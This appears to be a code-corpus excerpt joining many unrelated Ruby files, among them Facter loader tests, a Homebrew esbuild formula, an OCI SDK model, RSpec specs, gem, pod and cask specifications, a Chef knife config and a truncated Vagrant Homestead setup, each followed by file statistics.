search_path = places[:search_path] || []
loader = Facter::Util::Loader.new(env)
loader.stubs(:search_path).returns search_path
loader
end
it "should have a method for loading individual facts by name" do
Facter::Util::Loader.new.should respond_to(:load)
end
it "should have a method for loading all facts" do
Facter::Util::Loader.new.should respond_to(:load_all)
end
it "should have a method for returning directories containing facts" do
Facter::Util::Loader.new.should respond_to(:search_path)
end
describe "#valid_seach_path?" do
let(:loader) { Facter::Util::Loader.new }
# Used to have test for " " as a directory since that should
# be a relative directory, but on Windows in both 1.8.7 and
# 1.9.3 it is an absolute directory (WTF Windows). Considering
# we didn't have a valid use case for a " " directory, the
# test was removed.
[
'.',
'..',
'...',
'.foo',
'../foo',
'foo',
'foo/bar',
'foo/../bar',
' /',
' \/',
].each do |dir|
it "should be false for relative path #{dir}" do
loader.should_not be_valid_search_path dir
end
end
[
'/.',
'/..',
'/...',
'/.foo',
'/../foo',
'/foo',
'/foo/bar',
'/foo/../bar',
'/ ',
'/ /..',
].each do |dir|
it "should be true for absolute path #{dir}" do
loader.should be_valid_search_path dir
end
end
it "is true for paths with a file:/ uri scheme" do
loader.should be_valid_search_path 'file:/in/jar'
end
end
describe "when determining the search path" do
let(:loader) { Facter::Util::Loader.new }
it "should include the facter subdirectory of all paths in ruby LOAD_PATH" do
dirs = $LOAD_PATH.collect { |d| File.expand_path('facter', d) }
loader.stubs(:valid_search_path?).returns(true)
File.stubs(:directory?).returns true
paths = loader.search_path
dirs.each do |dir|
paths.should be_include(dir)
end
end
it "should exclude invalid search paths" do
dirs = $LOAD_PATH.collect { |d| File.join(d, "facter") }
loader.stubs(:valid_search_path?).returns(false)
paths = loader.search_path
dirs.each do |dir|
paths.should_not be_include(dir)
end
end
it "should include all search paths registered with Facter" do
Facter.expects(:search_path).returns %w{/one /two}
loader.stubs(:valid_search_path?).returns true
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one').returns true
File.stubs(:directory?).with('/two').returns true
paths = loader.search_path
paths.should be_include("/one")
paths.should be_include("/two")
end
it "should warn on invalid search paths registered with Facter" do
Facter.expects(:search_path).returns %w{/one two/three}
loader.stubs(:valid_search_path?).returns false
loader.stubs(:valid_search_path?).with('/one').returns true
loader.stubs(:valid_search_path?).with('two/three').returns false
Facter.expects(:warn).with('Excluding two/three from search path. Fact file paths must be an absolute directory').once
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one').returns true
paths = loader.search_path
paths.should be_include("/one")
paths.should_not be_include("two/three")
end
it "should strip paths that are valid paths but not are not present" do
Facter.expects(:search_path).returns %w{/one /two}
loader.stubs(:valid_search_path?).returns false
loader.stubs(:valid_search_path?).with('/one').returns true
loader.stubs(:valid_search_path?).with('/two').returns true
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one').returns true
File.stubs(:directory?).with('/two').returns false
paths = loader.search_path
paths.should be_include("/one")
paths.should_not be_include('/two')
end
describe "and the FACTERLIB environment variable is set" do
it "should include all paths in FACTERLIB" do
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one/path').returns true
File.stubs(:directory?).with('/two/path').returns true
loader = Facter::Util::Loader.new("FACTERLIB" => "/one/path#{File::PATH_SEPARATOR}/two/path")
File.stubs(:directory?).returns false
File.stubs(:directory?).with('/one/path').returns true
File.stubs(:directory?).with('/two/path').returns true
loader.stubs(:valid_search_path?).returns true
paths = loader.search_path
%w{/one/path /two/path}.each do |dir|
paths.should be_include(dir)
end
end
end
end
describe "when loading facts" do
it "should load values from the matching environment variable if one is present" do
loader = loader_from(:env => { "facter_testing" => "yayness" })
Facter.expects(:add).with("testing")
loader.load(:testing)
end
it "should load any files in the search path with names matching the fact name" do
loader = loader_from(:search_path => %w{/one/dir /two/dir})
loader.expects(:search_path).returns %w{/one/dir /two/dir}
File.stubs(:file?).returns false
File.expects(:file?).with("/one/dir/testing.rb").returns true
Kernel.expects(:load).with("/one/dir/testing.rb")
loader.load(:testing)
end
it 'should not load any ruby files from subdirectories matching the fact name in the search path' do
loader = Facter::Util::Loader.new
loader.stubs(:search_path).returns %w{/one/dir}
File.stubs(:file?).returns false
File.expects(:file?).with("/one/dir/testing.rb").returns true
Kernel.expects(:load).with("/one/dir/testing.rb")
File.stubs(:directory?).with("/one/dir/testing").returns true
loader.stubs(:search_path).returns %w{/one/dir}
Dir.stubs(:entries).with("/one/dir/testing").returns %w{foo.rb bar.rb}
%w{/one/dir/testing/foo.rb /one/dir/testing/bar.rb}.each do |f|
File.stubs(:directory?).with(f).returns false
Kernel.stubs(:load).with(f)
end
loader.load(:testing)
end
it "should not load files that don't end in '.rb'" do
loader = Facter::Util::Loader.new
loader.expects(:search_path).returns %w{/one/dir}
File.stubs(:file?).returns false
File.expects(:file?).with("/one/dir/testing.rb").returns false
File.expects(:exist?).with("/one/dir/testing").never
Kernel.expects(:load).never
loader.load(:testing)
end
end
describe "when loading all facts" do
let(:loader) { Facter::Util::Loader.new }
before :each do
loader.stubs(:search_path).returns []
File.stubs(:directory?).returns true
end
it "should load all files in all search paths" do
loader = loader_from(:search_path => %w{/one/dir /two/dir})
Dir.expects(:glob).with('/one/dir/*.rb').returns %w{/one/dir/a.rb /one/dir/b.rb}
Dir.expects(:glob).with('/two/dir/*.rb').returns %w{/two/dir/c.rb /two/dir/d.rb}
%w{/one/dir/a.rb /one/dir/b.rb /two/dir/c.rb /two/dir/d.rb}.each do |f|
File.expects(:file?).with(f).returns true
Kernel.expects(:load).with(f)
end
loader.load_all
end
it "should not try to load subdirectories of search paths" do
loader.expects(:search_path).returns %w{/one/dir /two/dir}
# a.rb is a directory
Dir.expects(:glob).with('/one/dir/*.rb').returns %w{/one/dir/a.rb /one/dir/b.rb}
File.expects(:file?).with('/one/dir/a.rb').returns false
File.expects(:file?).with('/one/dir/b.rb').returns true
Kernel.expects(:load).with('/one/dir/b.rb')
# c.rb is a directory
Dir.expects(:glob).with('/two/dir/*.rb').returns %w{/two/dir/c.rb /two/dir/d.rb}
File.expects(:file?).with('/two/dir/c.rb').returns false
File.expects(:file?).with('/two/dir/d.rb').returns true
Kernel.expects(:load).with('/two/dir/d.rb')
loader.load_all
end
it "should not raise an exception when a file is unloadable" do
loader.expects(:search_path).returns %w{/one/dir}
Dir.expects(:glob).with('/one/dir/*.rb').returns %w{/one/dir/a.rb}
File.expects(:file?).with('/one/dir/a.rb').returns true
Kernel.expects(:load).with("/one/dir/a.rb").raises(LoadError)
Facter.expects(:warn)
expect { loader.load_all }.to_not raise_error
end
it "should load all facts from the environment" do
loader = loader_from(:env => { "facter_one" => "yayness", "facter_two" => "boo" })
Facter.expects(:add).with('one')
Facter.expects(:add).with('two')
loader.load_all
end
it "should only load all facts one time" do
loader = loader_from(:env => {})
loader.expects(:load_env).once
loader.load_all
loader.load_all
end
end
it "should load facts on the facter search path only once" do
facterlibdir = File.expand_path(File.dirname(__FILE__) + '../../../fixtures/unit/util/loader')
Facter::Util::Loader.new('FACTERLIB' => facterlibdir).load_all
Facter.value(:nosuchfact).should be_nil
end
end
| 32.272727 | 124 | 0.637559 |
38b5daa14d40a902cf249b4344fdcb00a01c2615 | 1,704 | require "language/node"
class Esbuild < Formula
desc "Extremely fast JavaScript bundler and minifier"
homepage "https://esbuild.github.io/"
url "https://registry.npmjs.org/esbuild/-/esbuild-0.14.45.tgz"
sha256 "9a88eb91cd7f053d4229710e635ec0b4e33308fb4195f7c5993a52001301f0df"
license "MIT"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "0cdc6ed2a143b35500b6862baf1fef3fadb4c33f843c319ae7ee03245f7fec44"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "0cdc6ed2a143b35500b6862baf1fef3fadb4c33f843c319ae7ee03245f7fec44"
sha256 cellar: :any_skip_relocation, monterey: "ba136c45da1c7506a497f184b85ca251df023622ce97827b7d46d2d6df48e5b7"
sha256 cellar: :any_skip_relocation, big_sur: "ba136c45da1c7506a497f184b85ca251df023622ce97827b7d46d2d6df48e5b7"
sha256 cellar: :any_skip_relocation, catalina: "ba136c45da1c7506a497f184b85ca251df023622ce97827b7d46d2d6df48e5b7"
sha256 cellar: :any_skip_relocation, x86_64_linux: "e03f6c28bf14db79fe30e121b34cea81f9d6561fb8a5382c817cdaf5c4eaaf2c"
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
(testpath/"app.jsx").write <<~EOS
import * as React from 'react'
import * as Server from 'react-dom/server'
let Greet = () => <h1>Hello, world!</h1>
console.log(Server.renderToString(<Greet />))
EOS
system Formula["node"].libexec/"bin/npm", "install", "react", "react-dom"
system bin/"esbuild", "app.jsx", "--bundle", "--outfile=out.js"
assert_equal "<h1>Hello, world!</h1>\n", shell_output("node out.js")
end
end
| 41.560976 | 123 | 0.750587 |
1d5f251dcbf89041e95d260dc8aa4ed9ed18ec9b | 10,707 | # Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# An update available for installation on the Windows managed instance.
class OsManagement::Models::AvailableWindowsUpdateSummary
UPDATE_TYPE_ENUM = [
UPDATE_TYPE_SECURITY = 'SECURITY'.freeze,
UPDATE_TYPE_BUG = 'BUG'.freeze,
UPDATE_TYPE_ENHANCEMENT = 'ENHANCEMENT'.freeze,
UPDATE_TYPE_OTHER = 'OTHER'.freeze,
UPDATE_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
IS_ELIGIBLE_FOR_INSTALLATION_ENUM = [
IS_ELIGIBLE_FOR_INSTALLATION_INSTALLABLE = 'INSTALLABLE'.freeze,
IS_ELIGIBLE_FOR_INSTALLATION_NOT_INSTALLABLE = 'NOT_INSTALLABLE'.freeze,
IS_ELIGIBLE_FOR_INSTALLATION_UNKNOWN = 'UNKNOWN'.freeze,
IS_ELIGIBLE_FOR_INSTALLATION_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# **[Required]** Windows Update name
# @return [String]
attr_accessor :display_name
# **[Required]** Unique identifier for the Windows update. NOTE - This is not an OCID,
# but is a unique identifier assigned by Microsoft.
# Example: `6981d463-cd91-4a26-b7c4-ea4ded9183ed`
#
# @return [String]
attr_accessor :name
# **[Required]** The purpose of this update.
# @return [String]
attr_reader :update_type
# Indicates whether the update can be installed using OSMS.
# @return [String]
attr_reader :is_eligible_for_installation
# Indicates whether a reboot may be required to complete installation of this update.
# @return [BOOLEAN]
attr_accessor :is_reboot_required_for_installation
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'display_name': :'displayName',
'name': :'name',
'update_type': :'updateType',
'is_eligible_for_installation': :'isEligibleForInstallation',
'is_reboot_required_for_installation': :'isRebootRequiredForInstallation'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'display_name': :'String',
'name': :'String',
'update_type': :'String',
'is_eligible_for_installation': :'String',
'is_reboot_required_for_installation': :'BOOLEAN'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :display_name The value to assign to the {#display_name} property
# @option attributes [String] :name The value to assign to the {#name} property
# @option attributes [String] :update_type The value to assign to the {#update_type} property
# @option attributes [String] :is_eligible_for_installation The value to assign to the {#is_eligible_for_installation} property
# @option attributes [BOOLEAN] :is_reboot_required_for_installation The value to assign to the {#is_reboot_required_for_installation} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.display_name = attributes[:'displayName'] if attributes[:'displayName']
raise 'You cannot provide both :displayName and :display_name' if attributes.key?(:'displayName') && attributes.key?(:'display_name')
self.display_name = attributes[:'display_name'] if attributes[:'display_name']
self.name = attributes[:'name'] if attributes[:'name']
self.update_type = attributes[:'updateType'] if attributes[:'updateType']
raise 'You cannot provide both :updateType and :update_type' if attributes.key?(:'updateType') && attributes.key?(:'update_type')
self.update_type = attributes[:'update_type'] if attributes[:'update_type']
self.is_eligible_for_installation = attributes[:'isEligibleForInstallation'] if attributes[:'isEligibleForInstallation']
raise 'You cannot provide both :isEligibleForInstallation and :is_eligible_for_installation' if attributes.key?(:'isEligibleForInstallation') && attributes.key?(:'is_eligible_for_installation')
self.is_eligible_for_installation = attributes[:'is_eligible_for_installation'] if attributes[:'is_eligible_for_installation']
self.is_reboot_required_for_installation = attributes[:'isRebootRequiredForInstallation'] unless attributes[:'isRebootRequiredForInstallation'].nil?
raise 'You cannot provide both :isRebootRequiredForInstallation and :is_reboot_required_for_installation' if attributes.key?(:'isRebootRequiredForInstallation') && attributes.key?(:'is_reboot_required_for_installation')
self.is_reboot_required_for_installation = attributes[:'is_reboot_required_for_installation'] unless attributes[:'is_reboot_required_for_installation'].nil?
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] update_type Object to be assigned
def update_type=(update_type)
# rubocop:disable Style/ConditionalAssignment
if update_type && !UPDATE_TYPE_ENUM.include?(update_type)
OCI.logger.debug("Unknown value for 'update_type' [" + update_type + "]. Mapping to 'UPDATE_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
@update_type = UPDATE_TYPE_UNKNOWN_ENUM_VALUE
else
@update_type = update_type
end
# rubocop:enable Style/ConditionalAssignment
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] is_eligible_for_installation Object to be assigned
def is_eligible_for_installation=(is_eligible_for_installation)
# rubocop:disable Style/ConditionalAssignment
if is_eligible_for_installation && !IS_ELIGIBLE_FOR_INSTALLATION_ENUM.include?(is_eligible_for_installation)
OCI.logger.debug("Unknown value for 'is_eligible_for_installation' [" + is_eligible_for_installation + "]. Mapping to 'IS_ELIGIBLE_FOR_INSTALLATION_UNKNOWN_ENUM_VALUE'") if OCI.logger
@is_eligible_for_installation = IS_ELIGIBLE_FOR_INSTALLATION_UNKNOWN_ENUM_VALUE
else
@is_eligible_for_installation = is_eligible_for_installation
end
# rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
display_name == other.display_name &&
name == other.name &&
update_type == other.update_type &&
is_eligible_for_installation == other.is_eligible_for_installation &&
is_reboot_required_for_installation == other.is_reboot_required_for_installation
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[display_name, name, update_type, is_eligible_for_installation, is_reboot_required_for_installation].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 42.488095 | 245 | 0.713739 |
396b2cfcd38df31825bc6dfa972558baa7639f18 | 225 | class CreatePackageAddonTypes < ActiveRecord::Migration
def change
create_table :package_addon_types do |t|
t.string :name
t.integer :price
t.integer :total_spots
t.timestamps
end
end
end
| 18.75 | 55 | 0.688889 |
1d3634aa6e68742a297e66d420f85a1b0d2e2678 | 92 | # frozen_string_literal: true
module Perx
module Rubocop
VERSION = '0.0.3'
end
end
| 11.5 | 29 | 0.695652 |
1d882280919a71149ef77879dd91aefc46799f15 | 4,681 | require "spec_helper"
describe Devices::UnattendedUpgrade do
def create_example_releases
["1.0.0", "1.0.1"].map do |version|
["stable", "beta"].map do |channel|
["rpi", "rpi3", "rpi4"].map do |platform|
yield({ fbos_version: version, update_channel: channel }) if block_given?
Release.create!(image_url: "http://farm.bot/fw.fw",
version: version,
platform: platform,
channel: channel)
end
end
end
end
it "runs upgrades" do
destroy_everything!
create_example_releases
dev = FactoryBot.create(:device,
fbos_version: "1.0.0",
ota_hour: nil,
ota_hour_utc: Time.now.utc.hour,
last_saw_api: Time.now)
dev.fbos_config.update!(update_channel: "stable", os_auto_update: true)
expect_any_instance_of(Device).to receive(:send_upgrade_request)
Devices::UnattendedUpgrade.run!()
expect(Device.count).to eq(1)
end
it "specifies eligible devices for all update channels" do
destroy_everything!
create_example_releases do |params|
ota_hour_utc = [nil, Time.now.utc.hour].sample
device_params = params
.slice(:fbos_version)
.merge(ota_hour_utc: ota_hour_utc,
ota_hour: nil,
last_saw_api: Time.now)
FactoryBot
.create(:device, device_params)
.fbos_config
.update!(params.slice(:update_channel))
end
ua = Devices::UnattendedUpgrade.new
devices = ua.all_eligible_devices
expect(devices.map(&:fbos_version).uniq).to eq(["1.0.0"])
all_channels = devices.map { |d| d.fbos_config.update_channel }.sort.uniq
expect(all_channels).to eq(["beta", "stable"])
end
it "specifies eligible devices on a single update channel" do
destroy_everything!
create_example_releases
expect(Device.count).to eq(0)
utc_time = Time.now.utc.hour
devices = (1..5).to_a.map do |t|
raise "Perfect timing error" if utc_time != Time.now.utc.hour
dev = FactoryBot.create(:device,
fbos_version: "1.0.0",
ota_hour: nil,
ota_hour_utc: t.even? ? utc_time : nil,
last_saw_api: Time.now)
dev.fbos_config.update!(update_channel: "stable",
os_auto_update: true)
dev
end
# Ineligible: Different channel.
devices[0].fbos_config.update!(update_channel: "beta")
# Ineligible: Already on latest version.
devices[1].update!(fbos_version: "1.0.1")
# Ineligible: OS Auto Update disabled.
devices[2].fbos_config.update!(os_auto_update: false)
# The remianing two devices are eligible.
expect(Device.count).to eq(5)
ua = Devices::UnattendedUpgrade.new
latest = ua.latest_version("stable")
expect(latest).to eq("1.0.1")
eligible_devices = ua.eligible_devices("stable")
raise "Perfect timing error" if utc_time != Time.now.utc.hour
if eligible_devices.count != 2
puts "=== BEGIN TEST FAILURE DEBUGGING ==="
Device
.includes(:fbos_config)
.order(id: :asc)
.all
.pluck(:id, "fbos_configs.update_channel", :fbos_version, "fbos_configs.os_auto_update", :ota_hour_utc)
.map do |(id, uc, version, os_auto_update, ota_hour_utc)|
hr = Time.now.utc.hour
next "#{id} already up to date" if version == "1.0.1"
next "#{id} is not in stable" if uc != "stable"
next "#{id} opted out of auto update" unless os_auto_update
next "#{id} OTA update hour is #{ota_hour_utc}, not #{hr}" if ota_hour_utc != hr
"#{id} is OK??"
end.map { |s| puts s }
end
expect(eligible_devices.count).to eq(2)
end
it "does not push updates if you are already up to date" do
Release.destroy_all
Release.create!(image_url: "https://localhost/farmbot-rpi-12.0.0-rc9.fw",
version: "12.0.0-rc9",
platform: "rpi",
channel: "beta")
device = FactoryBot.create(:device)
device.update!(last_saw_api: Time.now,
ota_hour_utc: nil,
fbos_version: "12.0.0.pre.RC9")
device.fbos_config.update!(os_auto_update: true,
update_channel: "beta")
uu = Devices::UnattendedUpgrade.new
expect(uu.latest_version("beta")).to eq(device.fbos_version)
eligible_devices = uu.all_eligible_devices.pluck(:id)
expect(eligible_devices).to_not include(device.id)
end
end
| 37.150794 | 111 | 0.60329 |
d55cb2176bdc271281fb765591774d27cca5c8b2 | 954 | require 'json'
require 'omniauth-oauth2'
module OmniAuth
module Strategies
class Esa < OmniAuth::Strategies::OAuth2
DEFAULT_SCOPE = 'read'.freeze
option :name, 'esa'
option :client_options, site: 'https://api.esa.io'
uid { raw_info['id'] }
info do
{
nickname: raw_info['screen_name'],
name: raw_info['name'],
email: raw_info['email'],
image: raw_info['icon']
}
end
extra do
{
'raw_info' => raw_info
}
end
def raw_info
@raw_info ||= JSON.load(access_token.get('/v1/user').body)
end
def callback_url
full_host + script_name + callback_path
end
def authorize_params
super.tap do |params|
params[:scope] = request.params['scope'] if request.params['scope']
params[:scope] ||= DEFAULT_SCOPE
end
end
end
end
end
| 20.73913 | 77 | 0.54717 |
1aae90f51471c36e6dba4d9ea728764c5ffc7c16 | 270 | require 'spec_helper'
describe Spree::Admin::SlideLocationsController do
stub_authorization!
let(:slide_location) { create(:slide_location) }
context '#index' do
it 'returns 200' do
get :index
expect(response.status).to eq(200)
end
end
end | 19.285714 | 50 | 0.7 |
61ae9694388743c92ad8d73b2cf54c4e7124e59c | 67 | require "fibo/version"
module Fibo
# Your code goes here...
end
| 11.166667 | 26 | 0.701493 |
398b07a563be92ddf6129b5620c81e362b2b1965 | 2,743 | # To run these specs using rake, make sure the 'bones' and 'bones-extras'
# gems are installed. Then execute 'rake spec' from the main directory
# to run all specs.
require File.expand_path(
File.join(File.dirname(__FILE__), %w[.. lib ffi-rzmq]))
require 'thread' # necessary when testing in MRI 1.8 mode
Thread.abort_on_exception = true
require 'openssl'
require 'socket'
require 'securerandom'
# define some version guards so we can turn on/off specs based upon
# the version of the 0mq library that is loaded
def version2?
ZMQ::LibZMQ.version2?
end
def version3?
ZMQ::LibZMQ.version3?
end
SLEEP_SHORT = 0.1
SLEEP_LONG = 0.3
def delivery_sleep() sleep(SLEEP_SHORT); end
def connect_sleep() sleep(SLEEP_SHORT); end
def bind_sleep() sleep(SLEEP_LONG); end
def thread_startup_sleep() sleep(1.0); end
def connect_to_inproc(socket, endpoint)
begin
rc = socket.connect(endpoint)
end until ZMQ::Util.resultcode_ok?(rc)
end
module APIHelper
def stub_libzmq
@err_str_mock = mock("error string")
LibZMQ.stub!(
:zmq_init => 0,
:zmq_errno => 0,
:zmq_sterror => @err_str_mock
)
end
def poller_setup
@helper_poller ||= ZMQ::Poller.new
end
def poller_register_socket(socket)
@helper_poller.register(socket, ZMQ::POLLIN)
end
def poller_deregister_socket(socket)
@helper_poller.deregister(socket, ZMQ::POLLIN)
end
def poll_delivery
# timeout after 1 second
@helper_poller.poll(1000)
end
def poll_it_for_read(socket, &blk)
poller_register_socket(socket)
blk.call
poll_delivery
poller_deregister_socket(socket)
end
# generate a random port between 10_000 and 65534
def random_port
rand(55534) + 10_000
end
def bind_to_random_tcp_port(socket, max_tries = 500)
tries = 0
rc = -1
while !ZMQ::Util.resultcode_ok?(rc) && tries < max_tries
tries += 1
random = random_port
rc = socket.bind(local_transport_string(random))
end
unless ZMQ::Util.resultcode_ok?(rc)
raise "Could not bind to random port successfully; retries all failed!"
end
random
end
def connect_to_random_tcp_port socket, max_tries = 500
tries = 0
rc = -1
while !ZMQ::Util.resultcode_ok?(rc) && tries < max_tries
tries += 1
random = random_port
rc = socket.connect(local_transport_string(random))
end
unless ZMQ::Util.resultcode_ok?(rc)
raise "Could not connect to random port successfully; retries all failed!"
end
random
end
def local_transport_string(port)
"tcp://127.0.0.1:#{port}"
end
def assert_ok(rc)
raise "Failed with rc [#{rc}] and errno [#{ZMQ::Util.errno}], msg [#{ZMQ::Util.error_string}]! #{caller(0)}" unless rc >= 0
end
end
| 22.483607 | 127 | 0.696318 |
6a00753a76244745f75d3404c976f490cbed0e71 | 951 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe BillingAddress, type: :model do
xdescribe 'validations' do
let(:address) { FactoryBot.build(:billing_address) }
# NIP is the taxpayer ID number in the Republic of Poland
describe 'NIP number validation' do
context 'with valid NIP' do
it 'is valid' do
address.nip = '725-18-01-126'
expect(address).to be_valid
end
end
context 'with NIP = nil' do
it 'is invalid' do
address.nip = nil
expect(address).not_to be_valid
end
end
context "with NIP = ''" do
it 'is invalid' do
address.nip = ''
expect(address).not_to be_valid
end
end
context 'with incorrect NIP number' do
it 'is invalid' do
address.nip = '123-45-67-890'
expect(address).not_to be_valid
end
end
end
end
end
| 23.195122 | 61 | 0.583596 |
e88e0c1a1edbf2013ddfe5a30951feeb9557ffd9 | 646 | # -*- encoding: utf-8 -*-
$:.push File.expand_path("../lib", __FILE__)
require "ey_config/version"
Gem::Specification.new do |s|
s.name = 'ey_config'
s.version = EY::Config::VERSION
s.summary = 'Engine Yard Configuration'
s.description = 'Access to additional services for Engine Yard customers.'
s.authors = ["Jacob Burkhart & Michael Broadhead & others"]
s.email = ["[email protected]"]
s.files = Dir.glob("{bin,lib}/**/*") + %w(LICENSE README.md)
s.homepage = 'http://github.com/engineyard/ey_config'
s.executables = ['ey_config_local']
s.default_executable = 'ey_config_local'
s.require_path = 'lib'
end
| 34 | 76 | 0.678019 |
4a0b13e6b02ac7a66ef0644adc55ad98fd8d2480 | 465 | cask 'font-news-cycle' do
version :latest
sha256 :no_check
# github.com/google/fonts was verified as official when first introduced to the cask
url 'https://github.com/google/fonts/trunk/ofl/newscycle',
using: :svn,
revision: '50',
trust_cert: true
name 'News Cycle'
homepage 'https://www.google.com/fonts/specimen/News%20Cycle'
depends_on macos: '>= :sierra'
font 'NewsCycle-Bold.ttf'
font 'NewsCycle-Regular.ttf'
end
| 25.833333 | 86 | 0.690323 |
5dcb3528c95fd9093d10b8bef8c236c69d7d5158 | 1,065 |
Pod::Spec.new do |spec|
spec.name = "BWReportProblem"
spec.ios.deployment_target = '12.0'
spec.version = "0.1.1"
spec.summary = "BWReportProblem let's a user report any issues."
spec.homepage = "https://github.com/Rajesh9274/BWReportProblem"
spec.license = { :type => "MIT", :file => "LICENSE" }
spec.author = { "Rajesh Vekariya" => "[email protected]" }
spec.platform = :ios
spec.swift_version = "5.0"
spec.source = { :git => "https://github.com/Rajesh9274/BWReportProblem.git", :tag => "#{spec.version}" }
spec.source_files = "BWReportProblem/**/*.{swift}"
spec.resources = "BWReportProblem/Resources/*.{png,jpeg,jpg,storyboard,xib,xcassets}"
spec.framework = "UIKit"
spec.dependency 'Alamofire'
spec.dependency 'iOSPhotoEditor'
spec.dependency 'IBAnimatable'
spec.dependency 'SVProgressHUD'
spec.dependency 'ReachabilitySwift'
spec.dependency 'IQKeyboardManagerSwift'
spec.dependency 'Toast-Swift'
spec.swift_versions = ['4.2', '5.0', '5.1', '5.2']
end
| 35.5 | 112 | 0.668545 |
33ebbe7c6d674783992f78fcabfcd7da2da7eef7 | 664 | base_dir = File.join(File.dirname(File.expand_path(__FILE__)), '..')
log_level :info
log_location STDOUT
node_name 'pivotal'
client_key File.join(base_dir, '.chef', 'private.pem')
syntax_check_cache_path File.join(base_dir, '.chef', 'syntax_check_cache')
cookbook_path [File.join(base_dir, 'cookbooks')]
chef_server_url 'https://chefautomateserverlearning-r4vqejllbbralyoz.us-east-1.opsworks-cm.io/organizations/default'
ssl_ca_file File.join(base_dir, '.chef', 'ca_certs', 'opsworks-cm-ca-2016-root.pem')
trusted_certs_dir File.join(base_dir, '.chef', 'ca_certs')
| 51.076923 | 125 | 0.668675 |
3329a33fbd36cca2464fb5e66817dcfaa71aa3f1 | 383 | class CandidateInterface::ReviewApplicationComponent < ViewComponent::Base
attr_accessor :application_form
def initialize(application_form:)
@application_form = application_form
end
private
def reopen_date
Time.zone.now < CycleTimetable.date(:apply_opens) ? CycleTimetable.apply_opens.to_fs(:govuk_date) : CycleTimetable.apply_reopens.to_fs(:govuk_date)
end
end
| 27.357143 | 151 | 0.804178 |
212f18ef9d194bd2ddef838601ece0e8ca979daa | 6,443 | class Homestead
def Homestead.configure(config, settings)
# Set The VM Provider
ENV['VAGRANT_DEFAULT_PROVIDER'] = settings["provider"] ||= "virtualbox"
# Configure Local Variable To Access Scripts From Remote Location
scriptDir = File.dirname(__FILE__)
# Prevent TTY Errors
config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"
# Configure The Box
config.vm.box = settings["box"] ||= "laravel-c6"
config.vm.hostname = settings["hostname"] ||= "homestead-c6"
# Configure A Private Network IP
